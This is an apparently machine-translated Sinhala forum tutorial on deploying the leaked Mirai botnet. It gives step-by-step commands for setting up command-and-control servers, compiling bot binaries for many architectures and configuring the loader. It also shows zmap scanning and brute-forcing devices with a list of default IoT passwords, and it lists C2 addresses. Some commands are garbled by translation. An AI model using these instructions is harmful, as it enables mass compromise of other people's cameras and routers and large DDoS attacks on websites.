Mirai මූල කේතය. Mirai botnet ස්ථාපනය සහ වින්‍යාස කිරීම. මිරායි හි මෙහෙයුම් මූලධර්මය

එහි හරය ලෙස, Mirai සරලව ක්‍රියා කරයි: එය තිරිසන් බලයට සහ අනවසරයෙන් ඇතුළුවීමට ගොදුරු විය හැකි ටෙල්නෙට් හරහා ප්‍රවේශ විය හැකි IoT උපාංග සොයන අන්තර්ජාලය පරිලෝකනය කරයි. අනිෂ්ට මෘදුකාංග මූලික වශයෙන් නිරීක්ෂණ කැමරා, DVR සහ රවුටර වලට පහර දෙන අතර පසුව පණුවෙකු මෙන් ගුණ කරයි.

මෙම botnet විසින් මෑතකදී සිදු කරන ලද සහ යුරෝපයේ විශාලතම DDoS ප්‍රහාර වලින්. උපරිම ප්‍රහාරක බලය 620 Gbit/s සහ 1 Tb/s ට වඩා වැඩි විය. එවැනි ප්‍රතිඵල ලබා ගැනීම සඳහා, ප්‍රහාරකයින් UDP, DNS සහ HTTP ගංවතුර මෙන්ම GRE (Generic Routing Encapsulation) පැකට් භාවිතා කළ අතර, එය විශේෂඥයන් ඉතා අසාමාන්‍ය ලෙස හඳුනාගෙන ඇත.

MalwareTech විශේෂඥයින්ගේ නිගමන සාමාන්යයෙන් මෙම නිරීක්ෂණ සමග සමපාත වේ. ඉතින්, පැය දොළහක කාලයක් පුරා, පර්යේෂකයන් අද්විතීය IP ලිපින 72,000 ක් පමණ වාර්තා කර ඇති අතර, සෑම පැයකටම නව IPs 4,000 ක් දර්ශනය විය. මෙයින්, විශ්ලේෂකයින් නිගමනය කළේ බොට්නෙට් ප්‍රමාණය ඉතා මධ්‍යස්ථ බවයි - දිනකට උපාංග 120,000 ක් පමණ පමණි. තවද botnet එක වඩා විශාල වන අතර සංඛ්‍යා මිලියන 1-1.5 bots වුවද, MalwareTech පර්යේෂකයන් හෝ Akamai විශේෂඥයින් මෙයට එකඟ නොවේ.

"ටෙල්නෙට් ප්‍රහාරවල සරල බව හේතුවෙන් මීට පෙර බොහෝ දුරට නොසලකා හරින ලද මිරායි, පසුගිය සතියේ ලොව පුරා මාධ්‍යවල ප්‍රධාන මාතෘකාවක් බවට පත් විය, නීතිය ක්‍රියාත්මක කරන ආයතන බොහෝ ජාත්‍යන්තර සමාගම්වල සහාය ඇතිව පරීක්ෂණ දියත් කිරීමත් සමඟ," පර්යේෂකයන් ලියයි. . “හැකර්වරුන් වැඩි වැඩියෙන් අවදානමට ලක්විය හැකි IoT උපාංග සොයා ගැනීම හෝ NAT-ආරක්ෂිත උපාංග ආසාදනය කිරීමට පටන් ගැනීම නිසා ප්‍රබල DDoS ප්‍රහාර දැන් වඩාත් පොදු භාවිතයක් බවට පත්වනු ඇත. නිෂ්පාදකයින්ට ගෝලීය මුරපද සහිත උපාංග පෙරනිමියෙන් මුදා හැරීම නැවැත්වීමට සහ නඩුවේ පතුලේ අහඹු ලෙස ජනනය කරන ලද මුරපද සහිත උපාංග මුදා හැරීමට මාරු වීමට මෙය නියත වශයෙන්ම කාලයයි."

වාර්තාවට අමතරව, MalwareTech පර්යේෂකයන් විසින් Mirai ආසාදන පිළිබඳ සිතියමක් පෙන්වන වීඩියෝවක් ඇතුළත් කර ඇත (පහත බලන්න). පර්යේෂකයන්ගේ වෙබ් අඩවියේ ඔබට බොට්නෙට් හි අන්තර්ක්‍රියාකාරී සිතියමක් සොයාගත හැකිය, එය තත්‍ය කාලීනව යාවත්කාලීන වේ.

අපට VPS KVM සේවාදායකයන් දෙකක් සහ වසමක් අවශ්‍ය වේ. අථත්‍යකරණය KVM වේ, OpenVZ මෙවර අස්ථානගත වී ඇත.

මම මෙහි සේවාදායකයන් ගන්නවා -

අපි බොට්නෙට් එක සර්වර් එකක ඉන්ස්ටෝල් කරන්නෙමු, දෙවෙනි එකේ බොට්ස් ස්කෑන් කරන්නෙමු. (ම්ලේච්ඡ)

වැදගත්. සේවාදායකයන් Debian 8 මත පදනම් විය යුතු අතර අවම වශයෙන් 1GB RAM ප්‍රමාණයක් තිබිය යුතුය.

ඕනෑම වසමක්, එය වැදගත් නොවේ.

කණගාටුයි, ඇත්ත වශයෙන්ම, නමුත් VPS එකකට වසමක් අමුණන්නේ කෙසේදැයි මම ඔබට නොකියමි. එය අපහසු නැත, ඔබම එය තේරුම් ගනීවි.

පුට්ටිසහ අපි පටන් ගනිමු.

# apt-get update -y

# apt-get upgrade -y

# apt-get install unzip gcc golang විදුලි වැට තිරය sudo git -y

# apt-get install mysql-server -y

# apt-get install mysql-client -y

# apt-get install apache2 -y

MySQL ස්ථාපනය කරන විට, root පරිශීලකයා සඳහා MySQL වෙත ප්‍රවේශ වීමට මුරපදයක් සෑදීමට ඔබට අවශ්‍ය වනු ඇත. ඔබට කිසිදු "qwerty" නොමැතිව සාමාන්‍ය මුරපදයක් ලැබෙනු ඇත

එය කොහේ හරි ලියන්න, අපට එය නැවත අවශ්ය වනු ඇත.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y

#බේෂ්< <(curl -s -S -L

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

# gvm ස්ථාපනය go1.4

# gvm භාවිතා go1.4 [--පෙරනිමිය]

# gvm ස්ථාපනය go1.4 -B

# gvm භාවිතා කරන්න go1.4

# අපනයනය GOROOT_BOOTSTRAP=$GOROOT

# gvm ස්ථාපනය go1.5

# gvm භාවිතා කරන්න go1.5

# gvm ස්ථාපනය go1.8

# gvm භාවිතා කරන්න go1.8

සියලුම උපයෝගිතා ස්ථාපනය කිරීමෙන් පසු, බොට් මූලාශ්‍ර බාගන්න -

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

සහ එය සේවාදායකයට උඩුගත කරන්න. කණ්ඩායම wget, හෝ සරලව වැඩසටහන හරහා WinSCP.

# Unzip Mirai-Source-Code-master.zip

# cd Mirai-Source-Code-Master/mirai/tools

# gcc enc.c -o enc

# ./enc string *******(අපි සේවාදායකයට අමුණා ඇති අපගේ වසම ලියන්නෙමු) සහ Enter ඔබන්න.

මෙන්න ඔබට පහත පෙළ පෙනෙනු ඇත -

XOR"බයිට් 14 දත්ත...

\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22

14 - මෙන්න ඔබට වෙනස් අංකයක් ඇත, එබැවින් කරදර නොවන්න, සියල්ල නිවැරදියි.

අපි මේ සියලුම පෙළ පිටපත් කරමු.

නැනෝ සංස්කාරකය හරහා හෝ විවෘත කරන්න WinSCPගොනුව table.cෆෝල්ඩරයේ ඇති mirai/bot

මෙය බැලිය යුතුයි -

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

රේඛාව add_entry(TABLE_CNC_DOMAIN- උද්ධෘතවල ඇති සියල්ල ඔබ පිටපත් කළ ඔබේ පෙළට වෙනස් කරන්න. වෙනුවට " 30 " අපි අපේ අංකය ලියන්නෙමු, එය අපි පිටපත් කළෙමු. අපි රේඛාව සමඟම කරන්නෙමු add_entry(TABLE_SCAN_CB_DOMAIN

සංස්කාරකය සුරකින්න සහ වසා දමන්න.

සංස්කාරකයක් සමඟ ගොනුව විවෘත කරන්න mirai/cnc/main.go

අපි මෙය දකිනවා -

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

"127.0.0.1" වෙත වෙනස් කරන්න "127.0.0.1:3306"

"මුරපදය"අපි කලින් දාපු Password එක MySQL එකට වෙනස් කරනවා. "

ගොනුව සුරකින්න සහ සංස්කාරකය වසා දමන්න.

මේ සියල්ල පිටපත් කරන්න, එය අවශ්‍ය වන්නේ මන්දැයි මම ඔබට නොකියමි -

# mkdir /etc/xcompile

# cd /etc/xcompile

#wget

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

#wget

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

#wget

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

#wget

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

#wget

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

#wget

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

#wget

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

#wget

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

#wget

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

# tar -jxf cross-compiler-armv4l.tar.bz2

# tar -jxf cross-compiler-i586.tar.bz2

# tar -jxf cross-compiler-m68k.tar.bz2

# tar -jxf cross-compiler-mips.tar.bz2

# tar -jxf cross-compiler-mipsel.tar.bz2

# tar -jxf cross-compiler-powerpc.tar.bz2

# tar -jxf cross-compiler-sh4.tar.bz2

# tar -jxf cross-compiler-sparc.tar.bz2

# tar -jxf cross-compiler-armv6l.tar.bz2

# rm *.tar.bz2

# mv cross-compiler-armv4l armv4l

# mv හරස් සම්පාදකය-i586 i586

#mv හරස් සම්පාදකය-m68k m68k

# mv හරස් සම්පාදක-mips mips

# mv හරස් සම්පාදක-mipsel mipsel

# mv cross-compiler-powerpc powerpc

# mv හරස් සම්පාදක-sh4 sh4

# mv හරස් සම්පාදක-sparc ස්පාර්ක්

# mv cross-compiler-armv6l armv6l

# අපනයනය PATH=$PATH:/etc/xcompile/armv4l/bin

# අපනයනය PATH=$PATH:/etc/xcompile/i586/bin

# අපනයනය PATH=$PATH:/etc/xcompile/m68k/bin

# අපනයනය PATH=$PATH:/etc/xcompile/mips/bin

# අපනයනය PATH=$PATH:/etc/xcompile/mipsel/bin

# අපනයනය PATH=$PATH:/etc/xcompile/powerpc/bin

# අපනයනය PATH=$PATH:/etc/xcompile/powerpc-440fp/bin

# අපනයනය PATH=$PATH:/etc/xcompile/sh4/bin

# අපනයනය PATH=$PATH:/etc/xcompile/sparc/bin

# අපනයනය PATH=$PATH:/etc/xcompile/armv6l/bin

# අපනයනය PATH=$PATH:/usr/local/go/bin

# අපනයනය GOPATH=$HOME/Documents/go

# github.com/go-sql-driver/mysql ලබා ගන්න

# github.com/mattn/go-shellwords ලබා ගන්න

# cd මිරායි-මූලාශ්‍ර-කේත මාස්ටර්/මිරායි

# ./build.sh නිදොස් telnet

# ./build.sh telnet නිකුත් කරන්න

# mv mirai* /var/www/html

# cd /var/www/html

#mkdirbins

#mv*බින්/

දැන් MySQL.

# mysql -u root -p

මෙහිදී ඔබෙන් මුරපදයක් ඉල්ලා සිටිනු ඇත. ඔබ කලින් සැකසූ මුරපදය ඇතුළත් කරන්න.

# මිරායි දත්ත සමුදාය සාදන්න;

# මිරායි භාවිතා කරන්න

දැන් මෙහි ඇති සියලුම පෙළ පිටපත් කරන්න -

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

එය අලවා Enter ඔබන්න.

පෙළ මෙතැනින් පිටපත් කරන්න -

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

වෙනුවට anna-senpaiඔබගේ පිවිසුම ලියන්න. ඕනෑම. mywesomepassword එකත් එහෙමයි. බොට් පාලක පැනලයට ප්‍රවේශ වීමට අපට මෙම දත්ත අවශ්‍ය වනු ඇත.

එය මේ වගේ විය යුතුයි - පරිශීලක අගයන් ඇතුලත් කරන්න (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");

පිටපත් කරන්න, අලවන්න, Enter ඔබන්න.

දැන් ඔබට පිටතට යා හැකිය.

එය බොහෝ දුරට සිදු වී ඇත.

# cd මිරායි-මූලාශ්‍රය-කේත මාස්ටර්/මිරායි/නිදහස්

# ස්පර්ශ prompt.txt

# තිරය ./cnc

සෙල්ලිපිය බැලිය යුතුය MySQL DB විවෘත විය

අපි මෙම සැසිය වසා දමන්නේ නැත, අපි අලුත් එකක් විවෘත කරමු.

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

******* වෙනුවට, ඔබේ වසම ලියා විවෘත ක්ලික් කරන්න.

ඔබගේ පරිශීලක නාමය සහ මුරපදය ඇතුළත් කරන්න, මගේ නඩුවේ එය -

zaebalsjapisatj

එච්චරයි, අපි ඉන්නේ බොට් පාලක පැනලයේ.

දැන් අපට බොට්ස් අවශ්‍යයි. මෙහි සෑම දෙයක්ම සරලයි, ස්ථාපනයන් අවශ්ය නොවේ.

loader එක configure කරමු.

පෙළ ගොනු වලින් බොට්ස් එක් කළ හැකි වන පරිදි ලෝඩරය අවශ්‍ය වේ. අපි හිතමු අපි උපාංග සමූහයක් (රවුටර්, කැමරා, දුරකථන) නිර්මාණය කර ඇති අතර ඒවා බොට් එකට එකතු කිරීමට අපට ලෝඩරයක් අවශ්‍ය වේ.

එසේම loader යනු "පණුවෙකු" වේ

හරහා අපගේ සේවාදායකයට සම්බන්ධ වන්න PuTTY සහ WinSCP.

WinSCP භාවිතයෙන් අපි ගොනුව සොයා ගනිමු main.cෆෝල්ඩරය තුළ Mirai-Source-Code-master/dlr

තිර පිටපතේ පරිදි අපි අපගේ සේවාදායකයේ IP ලියන්නෙමු -

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

අපි කොමාව තබමු, එය එසේ විය යුතුය. සුරකින්න සහ වසා දමන්න.

දැන් සමඟ PyTTYඅපගේ සේවාදායකය වෙත ගොස් ලියන්න -

# cd Mirai-Source-Code-master/dlr

# chmod 777 *

# ./build.sh

# CD නිකුතුව

# mv dlr* ~/Mirai-Source-Code-master/loader/bins

දැන් අපි විවෘත කරමු WinSCPසහ ගොනුව සොයා ගන්න main.cෆෝල්ඩරය තුළ මිරායි-මූලාශ්‍ර-කේත මාස්ටර්/ලෝඩර්/එස්ආර්සී

තිර පිටපතේ මෙන් අපි එය අපගේ IP වෙත වෙනස් කරමු -

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

සුරකින්න සහ වසා දමන්න.

ඔස්සේ පුට්ටි -

# ./build.sh

භාවිතා කිරීම මගින් WinSCPගොනුව විවෘත කරන්න scanListen.goෆෝල්ඩරය තුළ සොයා ගත හැකි මිරායි-මූලාශ්‍ර-කේත මාස්ටර්/මිරායි/මෙවලම්

ඔබගේ සේවාදායක IP වෙත වෙනස් කරන්න -

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

ඊට පස්සේ එක්ක PyTTY -

# cd Mirai-Source-Code-master/mirai/tools

# යන්න තැනීමට scanListen.go

දැන් අපට නව ගොනුවක් තිබේ - ස්කෑන් සවන් දෙන්න(තොරව .යන්න, නිකම් ස්කෑන් සවන් දෙන්න)

ස්කෑන් සවන් දෙන්නෆෝල්ඩරයකට ගෙන යා යුතුය මිරායි-මූලාශ්‍ර-කේත මාස්ටර්/ලෝඩරය

උපකාරයෙන් පමණි WinSCPඑය ෆෝල්ඩරයකට දමන්න පැටවුම්කරු

දැන් අපි බලමු හැම දෙයක්ම වැඩ කරනවාද කියලා

# ./loader

තිරයේ ඇති දේ ඔබ දුටුවහොත්, සියල්ල නිවැරදියි -

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

දෝෂ තිබේ නම්, මාතෘකාවට ලියන්න, මම උදව් කරන්නෙමි.

ලැයිස්තුවෙන් බොට්ස් බාගත කිරීම සඳහා, පෙළ ගොනුව ෆෝල්ඩරයට දමන්න පැටවුම්කරුසහ විධානය ටයිප් කරන්න -

# cat list.txt | ./loader

එපමණයි, ඔබ බඳවා ගත් සියලුම බොට් ඔබ සමඟ සිටිනු ඇත, ඔවුන් ඔබේ විධානය මත වෙබ් අඩවි බිඳ දමයි.

මම පෞද්ගලිකව මෙම ක්රමය භාවිතා කර නැත, මම පහසු ක්රමයක් සොයා ගත්තා.

මෙන්න අපට දෙවන සේවාදායකයක් අවශ්ය වේ. එසේම මත ඩේබියන් 8.

# apt-get update -y

# apt-get upgrade -y

# apt-get install python-paramiko -y

# apt-get install zmap -y

zmapවරාය පරිලෝකනය සඳහා අපට එය අවශ්‍යයි. මෙහෙයුම් මූලධර්මය සමාන වේ KPortScan, 50 ගුණයක් පමණක් වේගවත්.

සියලුම කේතය මෙතැනින් පිටපත් කරන්න -

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

සහ ලෙස සුරකින්න scan.py

මෙහිදී ඔබට ඔබගේ මුරපද සහ පිවිසුම් එකතු කළ හැක -

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

නූල් සංයෝජනයඅල්ලන්න එපා!

මෙහිදී ඔබට බොට් එක පිහිටා ඇති සේවාදායකයේ IP ලියාපදිංචි කළ යුතුය -

සබැඳි බැලීමට ඔබ ලියාපදිංචි විය යුතුය.

අපි සියල්ල වෙනස් කර එය සුරකිමු.

අපි scan.py ගොනුව අපගේ සේවාදායකයේ ඕනෑම තැනකට දමන්නෙමු. දෙවන සේවාදායකයේ, එය සම්පූර්ණයෙන්ම ස්කෑන් කිරීම සඳහා වන අතර, අපි බොට් ස්පර්ශ නොකරන එකයි.

අපට ස්කෑන් කරන IP අවශ්‍යයි.

#zmap -p22 -o list.txt -B 100M(ඔබට වෙනත් වරායන් පරිලෝකනය කළ හැක, මම සෑම විටම 22 හෝ 23 ස්කෑන් කළෙමි)

සියලුම ප්රතිඵල ගොනුවේ ඇත list.txt

IP (වඩා හොඳ) ගොනුව එකතු කිරීමෙන් පසුව list.txtගොනුව අසල එය විසි කරන්න scan.pyසහ ලියන්න -

# python scan.py list.txt 500

ඒක තමයි, අපි ඉඳගෙන අපේ botnet වර්ධනය වන ආකාරය බලා සිටිමු.

අවම වශයෙන් bots 200 ක් ඇති විට, ඔබට loader දියත් කළ හැක.

මෙය සිදු කිරීම සඳහා, botnet ස්ථාපනය කර ඇති සේවාදායකය වෙත ගොස් -

# cd Mirai-Source-Code-master/loader

# ulimit -n 9999999

# ./scanListen | ./loader

දැන් bot එක "worm" වගේ වැඩ කරලා තව bots ඉවර කරනවා.

පසුගිය සතියේ, 1 Tb/s දක්වා ධාරිතාවක් සහිත වාර්තාගත DDoS ප්‍රහාරවලදී භාවිතා කරන Mirai botnet හි සංරචක සඳහා වන මූල කේතය අන්තර්ජාලය හරහා කාන්දු විය.

කලාව. රුසියානු සමූහාණ්ඩුවේ අපරාධ නීති සංග්රහයේ 273. අනිෂ්ට පරිගණක වැඩසටහන් නිර්මාණය, භාවිතය සහ බෙදා හැරීම

1. අනවසර විනාශය, අවහිර කිරීම, වෙනස් කිරීම, පරිගණක තොරතුරු පිටපත් කිරීම හෝ පරිගණක තොරතුරු ආරක්ෂණ උදාසීන කිරීම සඳහා දැනුවත්ව අදහස් කරන ලද පරිගණක වැඩසටහන් හෝ වෙනත් පරිගණක තොරතුරු නිර්මාණය කිරීම, බෙදා හැරීම හෝ භාවිතය, -

වසර හතරක් දක්වා වූ කාල සීමාවක් සඳහා නිදහස සීමා කිරීම හෝ වසර හතරක් දක්වා කාලයක් සඳහා බලහත්කාරයෙන් වැඩ කිරීම හෝ එම වාරය සඳහාම රුපියල් ලක්ෂ දෙකක් දක්වා දඩයක් සමඟ සිරගත කිරීම මගින් දඬුවම් ලැබිය යුතුය. මාස දහඅටක් දක්වා කාලයක් සඳහා වරදකරු වූ පුද්ගලයාගේ වැටුප් හෝ වෙනත් ආදායම් ප්රමාණය.

2. පුද්ගල කණ්ඩායමක් විසින් පූර්ව කුමන්ත්‍රණයකින් හෝ සංවිධානාත්මක කණ්ඩායමක් විසින් හෝ තම නිල තනතුර භාවිතා කරන පුද්ගලයෙකු විසින් සිදු කරන ලද, මෙන්ම විශාල හානියක් සිදු කළ හෝ ආත්මාර්ථකාමී අවශ්‍යතා මත සිදු කරන ලද ක්‍රියා මෙම ලිපියේ පළමු කොටසෙහි සපයා ඇත. , -

වසර හතරක් දක්වා වූ කාල සීමාවක් සඳහා නිදහස සීමා කිරීම හෝ වසර තුනක් දක්වා කාලයක් සඳහා ඇතැම් තනතුරු දැරීමට හෝ ඇතැම් ක්‍රියාකාරකම්වල යෙදීමට ඇති අයිතිය අහිමි කිරීම සමඟින් වසර පහක් දක්වා කාලයක් සඳහා බලහත්කාරයෙන් ශ්‍රමය සීමා කිරීමෙන් දඬුවම් ලැබිය යුතුය. එය නොමැතිව, හෝ රූබල් ලක්ෂයේ සිට දෙලක්ෂ දක්වා දඩයක් සමඟ වසර පහක් දක්වා සිරදඬුවමක් හෝ වරදකරු වූ පුද්ගලයාගේ වැටුප් හෝ වෙනත් ආදායම් ප්‍රමාණයෙන් වසර දෙක තුනක කාලයක් හෝ එසේ නොමැතිව සහ වසර තුනක් දක්වා කාලයක් සඳහා ඇතැම් තනතුරු දැරීමට හෝ යම් යම් ක්රියාකාරකම්වල නියැලීමට ඇති අයිතිය අහිමි කිරීම හෝ නොමැතිව.

3. මෙම ලිපියේ කොටස් එක හෝ දෙක සඳහා සපයා ඇති පනත්, ඒවා බරපතල ප්‍රතිවිපාක ගෙන දුන්නේ නම් හෝ ඒවා සිදුවීමේ තර්ජනයක් ඇති කළේ නම්, -

වසර හතක් දක්වා සිරදඬුවම් නියම කළ හැකිය.

මෙම botnet ප්‍රධාන වශයෙන් කැමරා, DVR උපාංග ආදියෙන් සමන්විත වේ.

ආසාදනය ඉතා සරලව සිදු වේ: විවෘත 80/23 (වෙබ්/ටෙල්නෙට්) වරායන් සඳහා අන්තර්ජාලය පරිලෝකනය කර දෘඪ-කේතගත ගිණුම් තෝරා ගනු ලැබේ.

පරිශීලකයින් කිහිප දෙනෙකු ඔවුන්ගේ බිල්ට් ගිණුම්වල මුරපද වෙනස් කරයි (හැකි නම්), එබැවින් බොට්නෙට් නිරන්තරයෙන් නව උපාංග සමඟ නැවත පුරවනු ලැබේ. ඔබට වෙබ් අතුරු මුහුණත සඳහා මුරපදය වෙනස් කළ හැකි නම්, මුරපදය සහ ටෙල්නෙට් ප්‍රවේශය තිබීම බොහෝ පරිශීලකයින් මග හරියි.

බහුලව භාවිතා වන ගිණුම් වන්නේ:

enable:system
shell:sh
පරිපාලක: පරිපාලක
root:xc3511
root:vizxv
root:admin
root:xmhdipc
මූල:123456
මූල:888888
support:support
මූල:54321
මූල: ජුවාන්ටෙක්
root:anko
මූල:12345
පරිපාලක:
root:default
පරිපාලක: මුරපදය
root:root
මූල:
පරිශීලක:පරිශීලක
පරිපාලක:smcadmin
root:pass
පරිපාලක:admin1234
මූල:1111
අමුත්තා:12345
මූල:1234
root:මුරපදය
මූල:666666
පරිපාලක:1111
සේවාව: සේවාව
root:පද්ධතිය
සුපරීක්ෂක:අධීක්ෂක
මූල:klv1234
පරිපාලක: 1234
root:ikwb
මූල:Zte521

ප්‍රවේශය ලබා ගැනීමෙන් පසු, නව බොට් එකක් තිබීම පිළිබඳව විධාන මධ්‍යස්ථානයට ද්විමය දැනුම්දීමක් ලැබේ:

4a 9a d1 d1 = XXX.XXX.XXX.XXX (ධාරක ලිපිනය මෙහි විය)
05 = ටැබ්
17 = 23 (වරාය 23 ටෙල්නෙට්)
05 = ටැබ්
61 64 6d 69 6e = පරිශීලක නාමය:පරිපාලක පරිපාලක
05= ටැබ්
61 64 6d 69 6e = පරිශීලක මුරපදය: පරිපාලක

බොට්නෙට් සංරචක විවිධ පරිසරවල වැඩ කිරීමට සැලසුම් කර ඇති අතර, හඳුනාගත් සාම්පල මගින් සාක්ෂි දරයි:

මිරයි.හස්තය
mirai.arm7
mirai.mips
mirai.ppc
mirai.sh4

විධාන සේවාදායකයන් දැනට පහත ලිපිනයන්හි පිහිටා ඇත:

103.1.210.27
103.1.210.28
185.130.225.65
185.130.225.66
185.130.225.83
185.130.225.90
185.130.225.94
185.130.225.95
185.70.105.161
185.70.105.164
185.93.185.11
185.93.185.12
200.170.143.5
46.249.38.145
46.249.38.146
46.249.38.148
46.249.38.149
46.249.38.150
46.249.38.151
46.249.38.152
46.249.38.153
46.249.38.154
46.249.38.155
46.249.38.159
46.249.38.160
46.249.38.161
80.87.205.10
80.87.205.11

botnet නිර්මාණය කිරීම සඳහා වන උපදෙස් ඉතා සරල ය, මෙන්න (මූලාශ්රය http://pastebin.com/E90i6yBB):

සැම දෙනාටම ආයුබෝවන්,

මම මුලින්ම DDoS කර්මාන්තයට යන විට, මම දිගු කලක් එහි රැඳී සිටීමට සැලසුම් කළේ නැත. මම මගේ මුදල් ඉපැයූවෙමි, දැන් IOT දෙස බලා සිටින ඇස් ගොඩක් තිබේ, එබැවින් GTFO වෙත කාලයයි. කෙසේ වෙතත්, මම සෑම ලිස්සා යාමක් සහ ඔවුන්ගේ මාමා දනිමි, qbot හැර යමක් තිබීම ඔවුන්ගේ තෙත් සිහිනයයි.

ඉතින් අද, මම ඔබ වෙනුවෙන් අපූරු නිකුතුවක් ගෙනාවා. Mirai සමඟින්, මම සාමාන්‍යයෙන් උපරිම 380k bots telnet වෙතින් පමණක් අදින්නෙමි. කෙසේ වෙතත්, Kreb DDoS පසු, ISPs සෙමින් වසා දමා ඔවුන්ගේ ක්‍රියාව පිරිසිදු කරමින් සිටියහ. අද, max pull 300k bots පමණ වන අතර, පහත වැටේ.

ඉතින්, මම ඔබේ සෙන්පායි, මම ඔබට නියම ලෙස සලකන්නම්, මගේ hf-chan.

මගේ CNC එකට පහර දීමෙන් ඔවුන් ඕනෑම දෙයක් කරනවා යැයි සිතූ සෑම කෙනෙකුටම, මම හොඳින් සිනාසුණෙමි, මෙම බොට් CNC සඳහා වසම භාවිතා කරයි. සියලුම bots නැවත සම්බන්ධ වීමට තත්පර 60ක් ගතවේ, lol

එසේම, malwaremustdie විසින් මෙම බ්ලොග් සටහනට කෑගසන්න
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html<- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
ඔබ ගැන බොහෝ ගෞරවයක් තිබුනා, ඔබ හොඳ ප්‍රතිවර්තකයෙක් යැයි සිතුවා, නමුත් මෙම ද්විමය ආපසු හැරවීමට ඔබ සැබවින්ම සම්පූර්ණයෙන්ම සහ සම්පූර්ණයෙන්ම අසාර්ථක විය. "අපිට තාමත් ඔයාට වඩා හොඳ කුං ෆු තියෙනවා" මට හිනා වෙන්න එපා කරුණාකර, ඔබ බොහෝ වැරදි කර ඇති අතර මගේ බයිනරි සමඟ විවිධ ද්විමය පවා පටලවා ගත්තා. LOL

මම ඔබට නැවත පහරවල් කිහිපයක් දෙන්නම්-
1) වරාය 48101 ආපසු සම්බන්ධ කිරීම සඳහා නොවේ, එය බොට් එකට ධාවනය වන අවස්ථා කිහිපයක් වැළැක්වීම සඳහා පාලනය කිරීම සඳහා වේ.
2) /dev/watchdog සහ /dev/misc යනු “ප්‍රමාදය ඇති කිරීම” සඳහා නොවේ, එය පද්ධතිය එල්ලීම වැළැක්වීම සඳහා වේ. මෙය පහත් පලතුරකි, ඔබ අතිශයින් ගොළු වීම ගැන කණගාටුයි
3) ඔබ අසාර්ථක වූ අතර FAKE_CNC_ADDR සහ FAKE_CNC_PORT සැබෑ CNC බව සිතුවා, lol "සහ 65.222.202.53 ට HTTP හරහා සම්බන්ධ වීමට පිටුපස දොරේ වැඩ කරනවා." සිග්නල් ප්‍රවාහයෙන් ඔබ පැකිළී ඇත ;) තව දුරටත් ස්කීඩෝ උත්සාහ කරන්න
4) ඔබේ ඇටසැකිලි මෙවලම බූරුවා උරා බොයි, එය සිතුවේ ප්‍රහාරක විකේතකය “සින්ඩෙන් විලාසය” බවයි, නමුත් එය පෙළ පදනම් වූ ප්‍රොටෝකෝලයක්වත් භාවිතා නොකරයිද? CNC සහ bot ද්විමය ප්‍රොටෝකෝලය හරහා සන්නිවේදනය කරයි
5) ඔබ පවසන්නේ ‘chroot(“/”) torlus වැනි අනාවැකි කළ හැකි බවයි, නමුත් ඔබට තේරෙන්නේ නැත, තවත් සමහරු cwd මත පදනම්ව මරා දමති. එය ඔබ සැබෑ අනිෂ්ට මෘදුකාංග සමඟ සිටින ආකාරය පෙන්වයි. ස්කිඩ්ලන්ඩ් වෙත ආපසු යන්න

ඔබ ප්‍රතිලෝම ඉංජිනේරු මෙවලම් ලියන්නේ ඇයි? ඔබට පළමු ස්ථානයේ දී නිවැරදිව ආපසු හැරවිය නොහැක. අන් අයව විශ්මයට පත් කිරීමට පෙර කරුණාකර යම් නිපුණතා ඉගෙන ගන්න. ඔබේ ගොළු කුං-ෆු ප්‍රකාශයෙන් ඔබ “මට පහර දුන්” ආකාරය ප්‍රකාශ කිරීමේ ඔබේ උද්දච්චකම නිසා මගේ SO ට මගේ පිටට තට්ටු කිරීමට සිදු විය.

මම සදහටම නිදහස් වන්නා සේම, ඔබ සදහටම මධ්‍යස්ථභාවයට පත් වනු ඇත.

අවශ්යතා
සේවාදායක 2ක්: CNC + mysql සඳහා 1, ස්කෑන් ග්‍රාහකය සඳහා 1, සහ පූරණය සඳහා 1+

OP අවශ්‍යතා
2 VPS සහ 4 සේවාදායක
— 1 දත්ත සමුදා සේවාදායකය සඳහා අතිශයින්ම වෙඩි නොවදින ධාරකයක් සහිත VPS
- 1 VPS, රූට්කිට්, ස්කෑන් ග්‍රාහකයා සහ බෙදාහරින්නා සඳහා
- CNC සඳහා 1 සේවාදායකය (400k bots සමඟ 2% CPU වැනි භාවිතා වේ)
- පැටවීම සඳහා 3x 10gbps NForce සේවාදායකයන් (බෙදාහරින්නා සේවාදායක 3 කට සමානව බෙදා හරිනු ලැබේ)

- CNC වෙත සම්බන්ධතාවක් ඇති කර ගැනීමට, bots වසමක් (resolv.c/resolv.h) විසඳා එම IP ලිපිනයට සම්බන්ධ කරයි.
